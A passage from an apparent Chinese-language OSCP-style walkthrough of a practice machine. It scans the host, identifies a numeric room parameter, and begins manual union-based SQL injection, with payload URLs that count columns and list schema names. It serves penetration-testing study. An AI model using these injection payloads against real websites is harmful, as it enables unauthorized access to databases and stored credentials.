此靶机以及带注入的靶机,大多数人用的sqlmap。针对oscp,本文章未用sqlmap。
其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。
所以学习手工注入也很必要。
注入也不一定仅仅是注入,在手工注入里也可以利用文件包含漏洞。
nmap
很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它
发现phpadmin,但是没密码,继续看80
发现换不同的房间,网址里的序号就变了一个。
像这种改一个展示的东西,网址里的数字序号就变了一个,这个就很可能存在sql注入。注入的知识,网上太多啦。。。
第一种方法,完整的手工注入全程:
先order by看,然后发现7,接着找显示位,再依次找库,库里找表,表里找柱,最后得到账号和密码
http://10.10.10.143/room.php?cod=1 order by 7
http://10.10.10.143/room.php?cod=1 order by 8
http://10.10.10.143/room.php?cod=-1 union all select 1,2,3,4,5,6,7
http://10.10.10.143/room.php?cod=-1 union all select 1,group_concat(schema_name),3,4,5,6,7